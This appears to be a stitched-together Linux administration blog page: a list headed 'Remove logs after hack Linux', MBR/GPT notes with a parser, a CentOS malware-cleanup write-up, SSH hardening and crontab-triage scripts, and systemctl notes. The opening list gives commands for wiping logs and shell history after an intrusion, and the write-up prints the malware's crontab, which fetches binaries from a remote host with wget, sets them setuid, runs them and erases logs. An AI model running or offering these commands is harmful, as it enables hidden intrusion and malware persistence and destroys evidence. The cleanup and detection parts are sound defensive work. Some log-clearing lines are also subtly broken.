Remove logs after hack Linux

1.echo “unset MAILCHECK” >> /etc/profile
2.rm -rf /root/.bash_history
3.touch /root/.bash_history
4.history -r
5.cd /var/log > dmesg
6.cd /var/log > auth.log
7.cd /var/log > alternatives.log
8.cd /var/log > boot.log
9.cd /var/log > btmp
10.cd /var/log > cron
11.cd /var/log > cups
12.cd /var/log > daemon.log
13.cd /var/log > dpkg.log
14.cd /var/log > faillog
15.cd /var/log > kern.log
16.cd /var/log > lastlog
17.cd /var/log > maillog
18.cd /var/log > user.log
19.cd /var/log > Xorg.x.log
20. cd /var/log > anaconda.log
21.cd /var/log > yum.log
22.cd /var/log > secure
23.cd /var/log > wtmp
24.cd /var/log > utmp
25.cd /var/log > messages
26.cd /var/log > spooler
27.cd /var/log > sudolog
28.cd /var/log > aculog
29.cd /var/log > access-log
30.cd /root > .bash_history
31. history -c

MBR vs GPT

MBR is the standard partitioning scheme that’s been used on hard disks since the PC first came out. It supports 4 primary partitions per hard drive, and a maximum partition size of 2TB.

GPT disks are new, and are readable only by Windows Server 2003 SP1, Windows Vista (all versions), and Windows XP x64 Edition. The GPT disk itself can support a volume up to 2^64 blocks in length. (For 512-byte blocks, this is 9.44 ZB – zettabytes. 1 ZB is 1 billion terabytes). It can also support theoretically unlimited partitions.

Windows restricts these limits further to 256 TB for a single partition (NTFS limit), and 128 partitions.

Only Itanium systems running Windows Server 2003 and Windows Vista systems with an EFI BIOS can boot from a GPT disk. The other operating systems mentioned earlier can use GPT disks as data disks but not boot disks.

MBR Disk Layout

The following diagram from the Microsoft TechNet Library provides an example of a typical MBR disk layout.


Figure 1: MBR Disk Layout

Perhaps one of the biggest pitfalls of MBR-based disks is their potential for corruption of the partition table, the region on the disk that records where each partition starts and ends in terms of logical block numbers. MBR disks have only one partition table to keep track of all the partitions on the disk. If that table becomes corrupt, the entire disk must be recovered from backup. GPT-based disks have redundant partition tables, so if one copy is detected as corrupt the disk can repair itself from the redundant copy.

For compatibility purposes, a Master Boot Record is kept at LBA 0 on GPT-based drives (the "protective MBR"), and the GPT header begins at LBA 1. The protective MBR carries a single partition entry of type 0xEE covering the whole disk, which prevents MBR-based disk utilities from recognizing the partition type and potentially corrupting the data. It is possible to convert an MBR disk to a GPT-based disk and vice versa, but any data must first be backed up and all the partitions deleted.
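As an added example (not part of the TechNet material quoted here), the Python below constructs a small disk image with a protective MBR and primary and backup GPT headers, then reads it the way a GPT-aware loader would: it recognises the single 0xEE entry, verifies the GPT header CRC32, and falls back to the backup header at the last LBA when the primary copy is damaged. The image contents, disk GUID and sizes are constructed for the example and correspond to no real disk.

```python
import struct
import zlib

SECTOR = 512
GPT_SIGNATURE = b"EFI PART"
HEADER_SIZE = 92  # size of the GPT header structure in the UEFI specification


def build_protective_mbr(total_sectors):
    """Constructed sample LBA 0: one partition entry of type 0xEE spanning the disk."""
    mbr = bytearray(SECTOR)
    size = min(total_sectors - 1, 0xFFFFFFFF)
    # entry 0 at offset 446: status, CHS start, type, CHS end, first LBA, sector count
    struct.pack_into("<B3sB3sII", mbr, 446, 0x00, b"\x00\x02\x00", 0xEE, b"\xff\xff\xff", 1, size)
    mbr[510:512] = b"\x55\xaa"  # MBR boot signature
    return bytes(mbr)


def build_gpt_header(my_lba, alternate_lba, entries_lba, total_sectors):
    """Constructed sample GPT header, zero-padded to one sector."""
    hdr = bytearray(HEADER_SIZE)
    # signature, revision 1.0, header size, header CRC (filled in last)
    struct.pack_into("<8sIII", hdr, 0, GPT_SIGNATURE, 0x00010000, HEADER_SIZE, 0)
    # this header's LBA, the other copy's LBA, first and last usable LBA
    struct.pack_into("<QQQQ", hdr, 24, my_lba, alternate_lba, 34, total_sectors - 34)
    hdr[56:72] = bytes(range(16))  # constructed disk GUID
    # partition entry array LBA, entry count, entry size, entry array CRC (no entries here)
    struct.pack_into("<QIII", hdr, 72, entries_lba, 128, 128, 0)
    struct.pack_into("<I", hdr, 16, zlib.crc32(bytes(hdr)))
    return bytes(hdr) + bytes(SECTOR - HEADER_SIZE)


def mbr_partition_types(sector0):
    """Partition type byte of each of the four MBR entries."""
    if sector0[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    return [sector0[446 + 16 * i + 4] for i in range(4)]


def is_protective_mbr(sector0):
    """A protective MBR has a single 0xEE entry; MBR-only tools see an unknown,
    fully allocated disk and leave it alone."""
    types = mbr_partition_types(sector0)
    return types[0] == 0xEE and all(t == 0 for t in types[1:])


def gpt_header_valid(sector):
    """Signature, plausible size and a matching CRC32 (computed with the CRC field zeroed)."""
    if sector[:8] != GPT_SIGNATURE:
        return False
    size = struct.unpack_from("<I", sector, 12)[0]
    if not HEADER_SIZE <= size <= SECTOR:
        return False
    stored = struct.unpack_from("<I", sector, 16)[0]
    tmp = bytearray(sector[:size])
    tmp[16:20] = b"\x00" * 4
    return zlib.crc32(bytes(tmp)) == stored


def select_gpt_header(disk):
    """Which header copy to trust: 'primary' (LBA 1), 'backup' (last LBA) or None."""
    if gpt_header_valid(disk[SECTOR:2 * SECTOR]):
        return "primary"
    last = len(disk) // SECTOR - 1
    if gpt_header_valid(disk[last * SECTOR:(last + 1) * SECTOR]):
        return "backup"
    return None


def build_disk(total_sectors=2048):
    """Constructed 1 MiB image: protective MBR, primary header at LBA 1, backup at the last LBA."""
    disk = bytearray(total_sectors * SECTOR)
    disk[0:SECTOR] = build_protective_mbr(total_sectors)
    disk[SECTOR:2 * SECTOR] = build_gpt_header(1, total_sectors - 1, 2, total_sectors)
    disk[-SECTOR:] = build_gpt_header(total_sectors - 1, 1, total_sectors - 33, total_sectors)
    return bytes(disk)


if __name__ == "__main__":
    image = build_disk()
    print("protective MBR:", is_protective_mbr(image[:SECTOR]))
    print("trusted header:", select_gpt_header(image))
    damaged = bytearray(image)
    damaged[SECTOR + 40] ^= 0xFF  # flip a byte of the primary header's first-usable-LBA field
    print("after damage:", select_gpt_header(bytes(damaged)))
```

The fallback in select_gpt_header is the behaviour the paragraph above describes: the CRC detects the corrupt copy and the reader continues from the redundant one instead of declaring the disk unreadable.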

GPT-based Disk Layout

The following diagram from the Microsoft TechNet Library provides an example of the disk layout for a GPT-based disk.

Figure: GPT Disk Layout

Removing Linux BASH SHELLSHOCKER MALWARE

Unknown processes dsfref, gfhddsfew, dsfref etc. start automatically on CentOS 6.5.

The virus is mainly present in /etc/init.d/. It runs automatically at system start, so remove its entry from /etc/init.d. These are the virus files and their locations:

/etc/dsfref,

/etc/gfhddsfew

/etc/dsfref

To Remove Virus from linux

Note: I used chattr -i to change the permissions and then deleted the file sfewfesfs. When I tried to delete the file without using chattr, it said the permissions could not be changed / the file could not be deleted. One more thing: when I ran #rm /etc/sfewfesfs without chattr, the computer restarted; it happened every time I tried to delete the file without chattr. And these executables show up in the running processes only when the internet is connected.

Linux can get infected? Why did this "wonderful" thing have to happen to me of all people... fortunately there was a way out, so no need to be too depressed, brother ~
The situation: access to the server was very slow and basic operations were impossible every now and then, and DNSPod kept emailing me "D Monitoring notice: Your website inaccessible."
The machine is CentOS, port 22 open with root login permitted, and a password nine characters long made of lowercase letters and digits.
I immediately asked the VPS provider about the situation; the feedback was that the machine had a virus and had been hacked.

chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
chattr -i /etc/gfhjrtfyhuf*
rm -rf /etc/gfhjrtfyhuf*
chattr -i /etc/dsfrefr*
rm -rf /etc/dsfrefr*
chattr -i /etc/sdmfdsfhjfe*
rm -rf /etc/sdmfdsfhjfe*
chattr -i /etc/rewgtf3er4t*
rm -rf /etc/rewgtf3er4t*
chattr -i /etc/gfhddsfew*
rm -rf /etc/gfhddsfew*
chattr -i /etc/ferwfrre*
rm -rf /etc/ferwfrre*
Recently, I received a call from one of my clients regarding the slowness (almost unresponsive) of their Linux server (running CentOS) and a rapid increase in their network traffic. Fortunately this was one of their lab servers and they did not incur any production outages.

Here is the output of the top command on this server:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1252 root 20 0 66.0g 2.9g 380 S 725.2 38.0 11935:13 .sshdd141199598
2025 root 20 0 423m 1760 0 S 3.2 0.0 0:39.98 gdmorpen
14295 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
14297 root 20 0 107m 1180 964 R 0.5 0.0 0:00.03 ps
8316 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8318 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.47 .sshhdd14119186
8319 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.27 .sshhdd14119186
8321 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.11 .sshhdd14119186
8338 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.67 .sshhdd14119186
8339 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.67 .sshhdd14119186
8341 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.86 .sshhdd14119186
8345 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.10 .sshhdd14119186
8360 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.59 .sshhdd14119186
8364 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.95 .sshhdd14119186
8371 root 20 0 4085m 32m 204 S 0.3 0.4 3:49.94 .sshhdd14119186
8380 root 20 0 4085m 32m 204 S 0.3 0.4 3:50.65 .sshhdd14119186


Here are the steps that I followed to remove this malware; hopefully this helps others having a similar issue.

1. Disconnect the server from network.

2. Take the backup of root crontab and remove the root crontab. You can restore any relevant entries that you are aware of from the backup.

3. Remove the following files:
#rm /etc/gfhjrtfyhuf
#rm /etc/sfewfesfs
#rm /etc/gdmorpen
#rm /etc/fdsfsfvff
#rm /etc/rewgtf3er4t
#rm /etc/smarvtd
#rm /etc/whitptabil
#rm /etc/.SSH2

In case you are not able to delete any of the above files, you might have to remove the immutable attribute first and then remove the file:
#chattr -i /etc/sfewfesfs
#rm /etc/sfewfesfs

4. Remove the following files from /tmp directory:
#rm /tmp/gfhjrtfyhuf
#rm /tmp/sfewfesfs
#rm /tmp/gdmorpen
#rm /tmp/fdsfsfvff
#rm /tmp/rewgtf3er4t
#rm /tmp/smarvtd
#rm /tmp/whitptabil
#rm /tmp/.sshdd*

5. Remove the file S99local from the /etc/rc*.d directories:
#rm /etc/rc2.d/S99local
#rm /etc/rc3.d/S99local
#rm /etc/rc4.d/S99local

6. Disable remote root login:

Open the file /etc/ssh/sshd_config and change the PermitRootLogin value to "no" (uncomment the line if it is commented out):
# Prevent root logins:
PermitRootLogin no

7. Connect/enable the network.

8. Update the system:
#yum update

9. Now check the currently running processes and make sure that no strange processes are running.

Logging into the server, I found the machine was sending traffic flat out, with the bandwidth saturated (it could send 10 GB in 5 minutes) and 100% CPU usage. Under top you could see a sfewfesfs process and a .sshddXXXXXXXXXXX process (a string of random numbers). Under /etc there were files with strange names such as sfewfesfs and nhgbhhj, shown in red by ls.
Something also had to be done about port 22, because when the hosting provider cannot be counted on, the only other option is to back up the data and reinstall! Here is the cleanup method I used, followed by a summary of countermeasures against brute force:
If you are a user inside a LAN, change the external mapping of port 22 to some other port XXXX, and change the root password:

passwd
Close root login on port 22:
in /etc/ssh/sshd_config, uncomment the PermitRootLogin line and change it to

PermitRootLogin no
View the occupied ports

netstat -atunlp
Notice the sfewfesfs and .sshdd1401029348 processes sending traffic
View the location of the process

ll /proc/<PID>
Delete the virus files

chattr -i /etc/sfewfesfs*
rm -rf /etc/sfewfesfs*
Look for other suspicious files, e.g. one named nhgbhhj, and delete them

rm -rf /etc/nhgbhhj
rm -rf /etc/nhgbhhj***
Delete the scheduled task (very important), otherwise the virus is resurrected!

rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/root.1
.SSH2: view hidden files with ls -al, then delete

rm -rf /etc/.SSH2
.sshdd1401029348: view hidden files with ls -al, then delete

rm -rf /tmp/.sshdd140*
Restart the server and you are done.
The experts online emphasise: leaving root login open on port 22 is asking for trouble (nozuonodie). This was the first time I experienced a Linux infection; I once thought it was a very secure operating system -_-! I felt cool and got careless.
Reminder about the cause of the infection

But for a VPS renter port 22 has to be open, and the root account and its privileges are needed! So what do you do?
---- The following is the important point of this article ----
How was a seemingly secure system broken into? The reason is that port 22 was open with a simple root password, for example:
root123
Hackers use brute force: they try "user name" + "password" combinations exhaustively for remote login. Because the default Linux administrator user name is root, they only have to brute-force the password, so you are asking for trouble ~~
Countermeasure

Another trick? Change the root user name (there is no dedicated command, so you can only modify the configuration files)
Log in as root and use vi to modify /etc/passwd and /etc/shadow
(If you are not sure about these two files, read: /etc/passwd and /etc/shadow explained)

vi /etc/passwd
Press the i key to enter edit mode, change "root" in the first row to the new user name, press Esc to leave edit mode, then enter :x to save and exit.

vi /etc/shadow
Press the i key to enter edit mode, change "root" in the first row to the new user name, press Esc to leave edit mode, then enter :x! to force save and exit.
NOTE: In order to use sudo properly, you need to modify /etc/sudoers as follows (from "How to add users to /etc/sudoers"):

vi /etc/sudoers
Find the line root ALL=(ALL) ALL
and add the following line below it: <new user name> ALL=(ALL) ALL
:x! to force save and exit.
Reconnect and log in with the new user name and the original root password. You're done!
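As an added example, not code from the post above, the Python below audits the two things that post relies on: the effective PermitRootLogin value in sshd_config and the set of UID 0 accounts in /etc/passwd. One caveat worth knowing when renaming root: sshd applies PermitRootLogin to every account whose UID is 0 regardless of its name, so a renamed root is still governed by it and still shows up in this audit. The sshd_config and passwd contents are constructed samples, and the OpenSSH default modelled by default_permit_root is "yes" before OpenSSH 7.0 and "prohibit-password" from 7.0 onwards.

```python
# Constructed sample files; nothing here is taken from a real host.
SAMPLE_SSHD_CONFIG = """\
# sshd_config (constructed sample)
Port 22
#PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no
MaxAuthTries 6
Match User deploy
    PasswordAuthentication no
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
admin2:x:0:0:renamed root:/root:/bin/bash
deploy:x:1001:1001::/home/deploy:/bin/bash
"""


def effective_sshd_options(text):
    """Return the global value sshd uses for each keyword (lower-cased keys).

    sshd keeps the first value it reads for a keyword and ignores later
    duplicates; only lines starting with '#' are comments. Parsing stops at the
    first Match block because settings inside it are conditional.
    """
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in opts:
            opts[key] = parts[1].strip()
    return opts


def uid0_accounts(passwd_text):
    """Every account name in passwd(5) text whose numeric UID is 0."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0":
            names.append(fields[0])
    return names


def audit(sshd_text, passwd_text, default_permit_root="yes"):
    """Return (code, message) findings for the brute-force exposure discussed above.

    default_permit_root models the OpenSSH default when the keyword is absent.
    """
    findings = []
    opts = effective_sshd_options(sshd_text)
    permit = opts.get("permitrootlogin", default_permit_root).lower()
    if permit == "yes":
        findings.append(("PERMIT_ROOT_LOGIN",
                         "every UID 0 account may log in with a password over SSH"))
    if opts.get("passwordauthentication", "yes").lower() == "yes":
        findings.append(("PASSWORD_AUTH",
                         "password authentication is enabled; guessing attacks are possible"))
    extra = [n for n in uid0_accounts(passwd_text) if n != "root"]
    if extra:
        findings.append(("EXTRA_UID0",
                         "UID 0 accounts besides root: " + ", ".join(extra)))
    return findings


if __name__ == "__main__":
    for code, msg in audit(SAMPLE_SSHD_CONFIG, SAMPLE_PASSWD):
        print(f"{code}: {msg}")
```

In the sample the commented "#PermitRootLogin yes" is ignored and the active "PermitRootLogin no" wins, so the remaining findings are the password authentication that brute force depends on and the second UID 0 account created by the rename.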
Attached virus script

*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo “unset MAILCHECK” >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
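The crontab above is the persistence mechanism the removal steps keep running into (step 2 backs up and removes root's crontab so entries can be reviewed before anything is restored). As an added example, not from the original posts, the Python below triages crontab text for the behaviours that script shows: downloads from remote hosts, setuid chmod, killing competing processes, running binaries straight out of /etc or /tmp, truncating /var/log files and wiping shell history, and it marks every-minute schedules on such lines. The sample crontab embedded in it is constructed; the host name is a placeholder, and only the file names are taken from the script above.

```python
import re
from collections import Counter

# Each rule is (code, regex over the command part of a crontab line).
RULES = [
    ("REMOTE_FETCH",   re.compile(r"\b(?:wget|curl)\b.*https?://")),
    ("SETUID_CHMOD",   re.compile(r"\bchmod\s+[4-7][0-7]{3}\b")),   # 4xxx/2xxx/6xxx/7xxx modes
    ("KILL_PROCESSES", re.compile(r"\b(?:killall|pkill)\s+-9\b")),
    ("LOG_TRUNCATE",   re.compile(r"cd\s+/var/log\s*>|>\s*/var/log/")),
    ("HISTORY_TAMPER", re.compile(r"\.bash_history|\bhistory\s+-[cr]\b|unset\s+MAILCHECK")),
    ("HIDDEN_PATH",    re.compile(r"/\.[A-Za-z0-9_]")),           # dot-files such as /tmp/.sshdd*
    ("EXEC_FROM_ETC",  re.compile(r"(?:^|[;&|]\s*|\bnohup\s+)(?:/etc|/tmp|/dev/shm)/\S+")),
]

# Constructed sample crontab; the host name is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
# constructed sample root crontab
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/1 * * * * killall -9 nfsd4
*/120 * * * * cd /etc; wget http://malware-host.example:8080/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * cd /var/log > secure
*/1 * * * * history -c
"""


def parse_entries(text):
    """Yield (line number, five schedule fields, command) for each job line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment or environment assignment
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        yield lineno, parts[:5], parts[5]


def triage(text):
    """Return [(line number, [codes], command)] for every job that matches a rule.

    EVERY_MINUTE is only added to lines that already matched something else:
    a minutely schedule is not suspicious on its own.
    """
    findings = []
    for lineno, schedule, command in parse_entries(text):
        codes = [code for code, rx in RULES if rx.search(command)]
        if not codes:
            continue
        if schedule[0] in ("*", "*/1"):
            codes.append("EVERY_MINUTE")
        findings.append((lineno, codes, command))
    return findings


def summarize(findings):
    """Count how often each code fired across the findings."""
    return Counter(code for _, codes, _ in findings for code in codes)


if __name__ == "__main__":
    results = triage(SAMPLE_CRONTAB)
    for lineno, codes, command in results:
        print(f"line {lineno}: {', '.join(codes)}: {command}")
    print(dict(summarize(results)))
```

Run against a real backup of /var/spool/cron/root, lines with no codes (the logrotate job in the sample) are candidates to restore; anything that fires REMOTE_FETCH, EXEC_FROM_ETC or LOG_TRUNCATE should not be.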

Centos 7 SYSTEMCTL && Run level && hostname

systemctl start httpd.service (service httpd start)

systemctl stop httpd.service ( service httpd stop)

systemctl restart httpd.service (service httpd restart)

systemctl status httpd.service ( service httpd status)

systemctl enable httpd.service (chkconfig httpd on)

systemctl disable httpd.service (chkconfig httpd off)

Task                      SysV (chkconfig / service)       systemd (systemctl)
Enable at boot            chkconfig --level 3 httpd on     systemctl enable httpd
Disable at boot           chkconfig --level 3 httpd off    systemctl disable httpd
Service status            service httpd status             systemctl status httpd (service details)
                                                           systemctl is-active httpd
Status of all services    chkconfig --list                 systemctl list-units --type=service
Start service             service httpd start              systemctl start httpd
Stop service              service httpd stop               systemctl stop httpd
Restart service           service httpd restart            systemctl restart httpd

[root@keeplive ~]# cat /etc/inittab
# inittab is no longer used when using systemd.
#
# ADDING CONFIGURATION HERE WILL HAVE NO EFFECT ON YOUR SYSTEM.
#
# Ctrl-Alt-Delete is handled by /etc/systemd/system/ctrl-alt-del.target
#
# systemd uses ‘targets’ instead of runlevels. By default, there are two main targets:
#
# multi-user.target: analogous to runlevel 3
# graphical.target: analogous to runlevel 5
#
# To set a default target, run:
#
# ln -sf /lib/systemd/system/<target name>.target /etc/systemd/system/default.target

Switching from the command line to the graphical level, the command is unchanged: init 5 or startx

Switching from the graphical level to the command line, the command is unchanged: init 3

The new version defines the run levels in /lib/systemd/system:

[root@keeplive ~]# ls -ltr /lib/systemd/system/runlevel*.target
lrwxrwxrwx. 1 root root 15 Nov 13 08:46 /lib/systemd/system/runlevel0.target -> poweroff.target
lrwxrwxrwx. 1 root root 13 Nov 13 08:46 /lib/systemd/system/runlevel1.target -> rescue.target
lrwxrwxrwx. 1 root root 17 Nov 13 08:46 /lib/systemd/system/runlevel2.target -> multi-user.target
lrwxrwxrwx. 1 root root 17 Nov 13 08:46 /lib/systemd/system/runlevel4.target -> multi-user.target
lrwxrwxrwx. 1 root root 17 Nov 13 08:46 /lib/systemd/system/runlevel3.target -> multi-user.target
lrwxrwxrwx. 1 root root 16 Nov 13 08:46 /lib/systemd/system/runlevel5.target -> graphical.target
lrwxrwxrwx. 1 root root 13 Nov 13 08:46 /lib/systemd/system/runlevel6.target -> reboot.target

You can set different run levels for different needs:

init 3

[root@keeplive ~]# ln -svf /lib/systemd/system/runlevel3.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/runlevel3.target’
[root@keeplive ~]# ln -svf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/multi-user.target’
[root@keeplive ~]# systemctl set-default multi-user.target
rm ‘/etc/systemd/system/default.target’
ln -s ‘/usr/lib/systemd/system/multi-user.target’ ‘/etc/systemd/system/default.target’
[root@keeplive ~]#

init 5

[root@keeplive ~]# ln -svf /lib/systemd/system/runlevel5.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/runlevel5.target’
[root@keeplive ~]# ln -svf /lib/systemd/system/graphical.target /etc/systemd/system/default.target
‘/etc/systemd/system/default.target’ -> ‘/lib/systemd/system/graphical.target’
[root@keeplive ~]# systemctl set-default graphical.target
rm ‘/etc/systemd/system/default.target’
ln -s ‘/usr/lib/systemd/system/graphical.target’ ‘/etc/systemd/system/default.target’

Modify the system run level:
1. systemd uses targets, a more flexible replacement for sysvinit run levels. Run level 3 is replaced by multi-user.target and run level 5 by graphical.target; runlevel3.target and runlevel5.target are symbolic links pointing to multi-user.target and graphical.target.
You can switch to "run level 3" with the following command:
systemctl isolate multi-user.target or systemctl isolate runlevel3.target

You can switch to "run level 5" with the following command:
systemctl isolate graphical.target or systemctl isolate runlevel5.target

2. How to change the default run level?
systemd uses a symbolic link to point to the default run level. Before creating a new link, remove the existing one with: rm /etc/systemd/system/default.target
Default boot to run level 3:
ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target

Default boot to run level 5:
ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

systemd does not use the /etc/inittab file.

Modify CentOS 7 hostname

In CentOS, there are three definitions hostname: static (static), transient (transient), and flexible (pretty). “Static” host name is also called kernel hostname, is the system at boot time from /etc/hostname
automatic initialization of the host name. “Transient” host name is in the system is running temporarily assigned host name, for example, assigned by DHCP or mDNS server.
Static hostname and transient hostname comply with the same character as the Internet domain restriction rules. On the other hand, a “flexible” is allowed to use
the hostname of free-form (including special / whitespace) host name, to show to the end user (eg Linuxidc).

In CentOS 7, a man named hostnamectl command-line tool that allows you to view or modify the host name associated with the configuration.

[root@keeplive ~]# hostnamectl
Static hostname: keeplive
Icon name: computer
Chassis: n/a
Machine ID: 2b48dba259f2428ca8038f7aeb1d7f15
Boot ID: 57772bec11854cd08ee72db54a1441d3
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-123.9.3.el7.x86_64
Architecture: x86_64
[root@keeplive ~]# hostnamectl status
Static hostname: keeplive
Icon name: computer
Chassis: n/a
Machine ID: 2b48dba259f2428ca8038f7aeb1d7f15
Boot ID: 57772bec11854cd08ee72db54a1441d3
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-123.9.3.el7.x86_64
Architecture: x86_64
[root@keeplive ~]# hostnamectl --static
keeplive
[root@keeplive ~]# hostnamectl --transient
keeplive
[root@keeplive ~]# hostnamectl --pretty

 
[root@rhel7 ~]# systemctl list-unit-files|grep enabled
cups.path enabled
abrt-ccpp.service enabled
abrt-oops.service enabled
abrt-vmcore.service enabled
abrt-xorg.service enabled
abrtd.service enabled
accounts-daemon.service enabled
atd.service enabled
auditd.service enabled
avahi-daemon.service enabled
bluetooth.service enabled
chronyd.service enabled
crond.service enabled
cups.service enabled
dbus-org.bluez.service enabled
dbus-org.fedoraproject.FirewallD1.service enabled
dbus-org.freedesktop.Avahi.service enabled
dbus-org.freedesktop.ModemManager1.service enabled
dbus-org.freedesktop.NetworkManager.service enabled
dbus-org.freedesktop.nm-dispatcher.service enabled
display-manager.service enabled
dmraid-activation.service enabled
firewalld.service enabled
firstboot-graphical.service enabled
gdm.service enabled
getty@.service enabled
hypervkvpd.service enabled
hypervvssd.service enabled
irqbalance.service enabled
iscsi.service enabled
ksm.service enabled
ksmtuned.service enabled
libstoragemgmt.service enabled
libvirtd.service enabled
lvm2-monitor.service enabled
mdmonitor.service enabled
microcode.service enabled
ModemManager.service enabled
multipathd.service enabled
NetworkManager-dispatcher.service enabled
NetworkManager.service enabled
nfs-lock.service enabled
packagekit-offline-update.service enabled
postfix.service enabled
rhsmcertd.service enabled
rngd.service enabled
